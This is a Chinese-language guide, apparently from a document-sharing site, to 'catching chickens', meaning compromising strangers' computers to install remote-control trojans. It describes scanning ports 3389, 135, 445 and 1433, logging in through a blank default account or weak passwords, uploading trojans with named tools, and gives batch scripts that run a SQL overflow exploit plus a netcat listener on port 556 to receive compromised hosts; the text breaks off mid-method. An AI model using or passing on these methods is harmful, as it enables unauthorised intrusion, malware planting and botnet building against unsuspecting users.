文档介绍:抓鸡方法思路心得最快最有效的 12 种抓鸡方法思路心得, 首先得准备, 免杀的 STAT 或一只免杀鸽子或者其他的远控,一个免费空间,一些工具( 下面会提到) (1) 扫 3389 端口抓***( 适合新手)( 抓不了国外***) 现在国内网络上流传着一种克隆版的 XP ,安装后会默认开启一个账号为 new, 密码为空的账户, 而且基本上都是开着 3389 的, 我们就可以利用这一点来抓***。首先用端口扫描工具(如S扫) 扫一段 IP的 3389 端口, 扫完后就直接用远程桌面连接开放 3389 的机器(也可以把结果保存为文本文件,用批量生成 3389 连接的工具来连接), 然后输入账号 new 登入, 如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~ 这种方法只针 XP 系统,如果遇到 2000 或者 2003 系统就不要试了呵呵。缺点也很明显, 如果别人不是用 new 账号登入 XP 的,你再登入上去就会把他挤出去(XP 只支持单用户登入,用户登入需要用工具开) ,或者电脑前有人你就不可能去打开 IE 下载木马了。(2) 扫 135 端口抓***首先先用端口扫描器扫一段 IP的 135 端口,然后把结果保存, 再用 NTSCAN 过滤有弱口令的机器,最后用 recton 开 传马。因为现在 135和 445 端口都被防火墙屏蔽了, 只能扫本地的 135 ***, 要抓外地的只能用外地的 135 ***来扫。( 详细动画可以去黑客网站搜索 135) (3) 扫 445 端口抓***和扫 135 抓***差不多,首先先用端口扫描器扫一段 IP的 445 端口,然后把结果保存,再用 NTSCAN 过滤有弱口令的机器,最后用啊D 工具包开共享传马。因为现在 135和 445 端口都被防火墙屏蔽了, 只能扫本地的 445 ***, 要抓外地的只能用外地的 445 ***来扫。(详细动画可以去黑客网站搜索 445) (4)1433 端口批量溢出抓***这个方法可以实现全自动抓鸡, 不过现在太多人搞, 成功率已经不高了。要用到的工具: S扫 批处理文件首先先写个批处理, 打开记事本, 把以下代码复制修改后, 储存为扫描+ 文件***@echo off for /f "eol=; tokens=1,2 delims= " %%i in () do tcp %%i %%j 1433 1000 /save ***@echo off for /f "eol=; tokens=1 delims= " %%i in () do sqlhello %%i 1433 556 还要新建一个 ,里面你要扫的 IP 段,格式为 , 中间是空格 1433 是要扫描的端口, 1000 是扫描线程数, do sqlhello %%i 1433 556 这个里的 XXX 添你的 IP, 556 是后面 NC监听的端口然后再写个批处理***@echo off Nc -l -vv -p 556 然后再新建一个 , 里面填写溢出成功后让***下载你木马的代码。这里给出一种代码